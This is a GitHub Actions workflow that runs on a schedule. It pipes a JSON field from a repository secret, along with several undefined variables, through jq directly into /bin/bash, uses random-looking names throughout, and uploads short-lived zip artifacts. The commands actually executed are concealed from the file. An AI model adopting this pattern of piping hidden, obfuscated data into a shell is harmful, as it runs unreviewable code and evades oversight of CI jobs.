name: shihuanyuege
on:
  workflow_dispatch:

  schedule:
    - cron: '18 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shihuanyuege
        env:
          o80411: ${{ secrets.o80411 }}
        run: |
          printf '%s' "$o80411" | jq -r .ug48966 | /bin/bash
          echo $jvj59315 | jq -r .p14 | /bin/bash
          printf '%s' "$nqwgv8" | jq -r .hwu37662 | /bin/bash
          printf '%s' "$tm5663" | jq -r .evtq88157 | /bin/bash
          printf '%s' "$uv73" | jq -r .c452 | /bin/bash
          echo $trke5050 | jq -r .bm7971 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ZA30rYyz
          path: "*.zip"
          retention-days: 1
